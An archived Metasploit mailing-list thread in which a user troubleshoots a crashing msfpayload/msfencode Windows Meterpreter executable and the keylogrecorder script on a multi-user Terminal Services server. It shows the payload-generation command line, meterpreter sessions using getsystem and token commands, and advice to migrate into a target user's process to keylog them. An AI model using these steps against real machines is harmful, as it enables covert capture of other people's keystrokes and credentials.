Metasploit mailing list archives
Re: keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads.
From: c0lists <lists () carnal0wnage com>
Date: Thu, 2 Dec 2010 20:34:38 -0500
On Thu, Dec 2, 2010 at 7:36 PM, Richard Miles <richard.k.miles () googlemail com> wrote:
> Hi
>
> Nice. Can I have a beta of this smartlocker?

Not sure it will help you this time, as the "fix" is to just pick the right one.

> Or can you share the inside details of how you solved this problem?

Sure: pick the user you want to keylog, manually migrate into their process, then run the keylogger.

> On Thu, Dec 2, 2010 at 5:47 PM, c0lists <lists () carnal0wnage com> wrote:
>> Actually mubix and I will be releasing smartlocker shortly that should
>> handle some of the issues with multiple winlogon sessions.
>>
>> Guess this is a good kick in the butt to do that...
>>
>> -CG
>>
>> On Thu, Dec 2, 2010 at 6:17 PM, Richard Miles <richard.k.miles () googlemail com> wrote:
>>> Hi
>>>
>>> I ended up unloading my antivirus and I was able to execute mspayload
>>> portable (last release available at the Metasploit website). Most of the
>>> features work very well, but when I try to create .exe payloads, the
>>> file is created but not in the correct way.
>>>
>>> I created it using:
>>>
>>> C:\Temp\ruby\bin>ruby.exe ..\..\msf3\msfpayload windows/meterpreter/bind_tcp LHOST=127.0.0.1 R | ruby.exe ..\..\msf3\msfencode -e x86/shikata_ga_nai -t exe > test.exe
>>> [*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)
>>>
>>> The test.exe was created, but when executed it starts and finishes
>>> (crash?) in the same second.
>>>
>>> If I generate the same payload from my Linux box it works very well. So,
>>> I believe it may be a bug.
>>>
>>> The other thing that caught my attention is keylogrecorder from Carlos:
>>> it doesn't appear to work in a Terminal Service environment with
>>> multiple users. See the output:
>>>
>>> meterpreter > run keylogrecorder -c 0
>>> [*] explorer.exe Process found, migrating into 3247
>>> [*] Migration Successful!!
>>> [*] explorer.exe Process found, migrating into 3622
>>> [-] Error in script: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
>>> meterpreter > getuid
>>> Server username: MyDomain\User01
>>> meterpreter > rev2self
>>> meterpreter > getuid
>>> Server username: MyDomain\User01
>>> meterpreter > drop_token
>>> Relinquished token, now running as: MyDomain\User01
>>> meterpreter > getuid
>>> Server username: MyDomain\User01
>>> meterpreter >
>>>
>>> It clearly finds the first exploit and migrates to it, but it continues
>>> in the loop and tries to find the second user to migrate, but it failed
>>> because the previously migrated process is not administrator.
>>>
>>> I also tried to revert my privilege to admin with rev2self or drop_token
>>> but it doesn't work.
>>>
>>> My workaround was to modify the script to look for a specific pid and
>>> end the loop when it is found. But a patch to fix it properly would be
>>> nice. Maybe ask for the name of the user to inject the keylogger into,
>>> or maybe restore the older privileges before migrating to the next;
>>> maybe this way we could keylog all the sessions at the same time?
>>>
>>> Also, on this server I found a strange situation, where different
>>> sessions do not have an explorer.exe, and consequently the script
>>> failed. I found just a few executables in use for these users. I used
>>> pslist and I got the main process (using tree view - there are 2 main
>>> processes), and I modified the keylogger to migrate to this process,
>>> but the crazy thing is that it just freezes.
>>>
>>> meterpreter > getsystem
>>> ...got system (via technique 1).
>>> meterpreter > run keylogrecorder -c 0 -t 15
>>> [*] spshell.exe Process found, migrating into 1980
>>>
>>> And it keeps on this screen forever.
>>>
>>> Depending on the process, it just gets stopped forever on this stage. On
>>> the other, it also gets stopped forever on this stage but the main
>>> process day.
>>>
>>> Has anyone seen anything like that? Ideas why it happens? How to solve
>>> the situation? I'm unable to view to record the user activity in this
>>> case.
>>>
>>> Does anyone have any suggestions?
>>>
>>> Thanks
>>> _______________________________________________
>>> https://mail.metasploit.com/mailman/listinfo/framework